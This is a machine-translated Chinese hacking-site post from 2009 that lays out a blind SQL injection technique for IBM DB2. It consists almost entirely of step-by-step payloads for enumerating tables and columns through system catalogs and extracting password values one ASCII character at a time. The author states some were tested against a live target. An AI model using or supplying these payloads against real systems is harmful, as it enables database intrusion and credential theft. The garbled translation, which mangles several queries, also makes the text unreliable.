DB2 database ASCII half-fold method-injection method-vulnerability warning-the black bar safety net

2009-09-22T00:00:00
ID MYHACK58:62200924745
Type myhack58
Reporter 佚名
Modified 2009-09-22T00:00:00

Description

Go from:[Zhu Commander-in-chief]

DB2 database ASCII half-fold method injection method

UNION way is temporarily not available. research, the air then toss, the project has encountered a DB2 database, the Internet wasn't full of information, shoving the whole of this part, the first Strip and the second strip has been in the actual injection environment for testing, the rest of the article in Query Analyzer to test OK.

Man to be kind, reproduced please indicate the source

Guess the user table number: and 0<(SELECT count(NAME) FROM SYSIBM. SYSTABLES where CREATOR=USER)

Guess table length: and 3<(SELECT LENGTH(NAME) FROM SYSIBM. SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

Guess the table the first character of ASCII code: and 3<(SELECT ASCII(SUBSTR(NAME,1,1)) FROM SYSIBM. SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

Guess the table column name of the quantity: and 1<(SELECT COUNT(COLNAME) FROM SYSCAT. columns where tabname use=’TABLE‘)

Guess the first column name the length of the and 1<(SELECT LENGTH(COLNAME) FROM SYSCAT. columns where tabname use=’TABLE‘ and colno=0)

Guess the first column names the first character of the ASCII code and 1<(SELECT ASCII(SUBSTR(COLNAME,1,1)) FROM SYSCAT. columns where tabname use=’TABLE‘ and colno=0)

Depending on the ID rows in descending order, guess the first PASSWD length and 0<(SELECT LENGTH(PASSWD) FROM TABLE ORDER BY _ID _DESC FETCH FIRST 1 ROWS ONLY)

Depending on the ID rows in descending order, guess the first PASSWD the first character of the ASCII code and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

Guess the second one is the PASSWD the first character of the ASCII code and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE where PASSWD not in(’grou1‘) fetch first 1 rows only)